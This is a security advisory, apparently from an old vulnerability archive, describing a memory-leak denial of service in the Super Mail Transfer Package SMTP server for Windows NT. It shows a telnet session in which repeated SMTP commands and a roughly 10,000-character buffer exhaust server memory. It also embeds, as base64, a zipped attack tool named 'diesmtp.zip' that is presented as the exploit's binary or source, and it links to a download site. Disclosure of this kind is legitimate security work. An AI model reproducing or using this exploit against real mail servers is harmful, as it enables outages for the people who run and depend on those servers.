COMMAND
Super Mail Transfer Package (SMTP) Server
SYSTEMS AFFECTED
Super Mail Transfer Package (SMTP) Server for WinNT Version 1.9x
PROBLEM
USSR Labs found following. A memory leak exists in the Super Mail
Transfer Package that may cause an NT host to stop functioning
and/or need to be rebooted. The memory leak may occur when you
connect to the SMTP port, all information you send to the system
will be stored in memory, and SMTP support multiples HELO/ MAIL
FROM/ RCPT TO / DATA in the same connection. If you did multiple
HELO/ MAIL FROM/ RCPT TO / DATA in the same connection the memory
may not be deallocated. This condition may cause the computer to
stop functioning the moment memory runs out. Example:
[hellme@die-communitech.net$ telnet example.com 25
Trying example.com...
Connected to example.com.
Escape character is '^]'.
220 MachineNamet AttackerIp with SMTP for NT BD0198
HELO CHEEF
250 Hello, AtackerHostName AttackerIp
mail to:<sssa.com>
250 <sssa.com@localhost> ok
rcpt to:<sssc.com>
250 to:<sssc.com> ok
Data
354 Send Mail Message Body; End with <CR><LF>.<CR><LF>
[buffer]
(point)
250 OK
If you repeat this commands all information passed to the server
will be stored in memory thus the memory leak problem. [buffer]
is aprox. 10000 characters.
Binary or source for this D.o.s:
http://www.ussrback.com/
Mimed version of it follows:
---
Content-Type: application/octet-stream; name="diesmtp.zip"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="diesmtp.zip"
Content-MD5: cPSwnGaEYeZLHg6PW2bi8Q==
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
-----
SOLUTION
The related problems are fixed in the next generation of SMTP call
MsgCore/NT.